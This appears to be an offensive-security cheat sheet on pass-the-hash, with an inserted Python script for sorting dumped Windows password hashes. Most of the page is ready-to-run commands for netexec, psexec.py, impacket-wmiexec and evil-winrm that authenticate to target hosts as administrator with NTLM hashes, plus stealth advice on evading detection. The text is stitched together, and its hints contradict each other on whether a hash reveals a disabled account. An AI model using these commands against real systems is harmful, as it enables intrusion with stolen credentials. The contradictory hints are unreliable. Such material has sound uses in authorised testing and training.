Technique

Pass-the-Hash Attacks


1.0 Hints

Useless Hashes

Deactivated accounts can be identified by the first 5 characters of the hash. Dumped hashes are written in the format LM:NT, for example aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0, where aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password (LM storage disabled) and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. An entry with that NT hash cannot be used to authenticate, so it is useless for pass-the-hash.
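As an added example (not from this page or any of the tools it lists), a small auditor for secretsdump-style dump lines that separates the empty-password and LM-stored entries described above from the usable ones; the Administrator NT hash is the one quoted on this page, the "legacy" line is constructed sample data.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Hashes of an empty password, as quoted in the "Useless Hashes" hint above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM("") -> LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT("") -> no password set

# One secretsdump-style line: user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


@dataclass
class HashEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT  # cannot authenticate with this entry

    @property
    def lm_stored(self) -> bool:
        return self.lm != EMPTY_LM  # host still stores weak LM hashes


def parse_line(line: str) -> Optional[HashEntry]:
    """Parse one dump line; None for anything that is not in the expected format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return HashEntry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower())


def audit(dump_text: str) -> dict:
    """Bucket accounts into empty-password, LM-stored and usable lists (in dump order)."""
    report = {"empty_password": [], "lm_stored": [], "usable": []}
    for entry in filter(None, map(parse_line, dump_text.splitlines())):
        report["empty_password" if entry.empty_password else "usable"].append(entry.user)
        if entry.lm_stored:
            report["lm_stored"].append(entry.user)
    return report


# Constructed sample dump: default disabled built-ins (Guest, DefaultAccount) carry
# the empty NT hash; "legacy" is a hypothetical account on a host that still stores LM.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3542d79d5d17bc9d3014d4d56b5e3060:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""
```

The dump alone does not carry the account's enabled/disabled flag: a disabled account that still has a real password keeps its real NT hash, so confirm account status separately before drawing conclusions.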

2.0 Tools

2.1 Netexec

nxc smb $ip1 $ip2 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth

2.2 psexec.py

Hint

PSExec is not very stealthy; WMIExec is the better choice.

psexec.py administrator@$ip -hashes aad3b435b51404eeaad3b435b51404ee:3542d79d5d17bc9d3014d4d56b5e3060

2.3 impacket-wmiexec

impacket-wmiexec administrator@$ip -hashes aad3b435b51404eeaad3b435b51404ee:3542d79d5d17bc9d3014d4d56b5e3060

2.4 evil-winrm

evil-winrm -u administrator -H 5b38382017f8c0ac215895d5f9aacac4 -i $ip
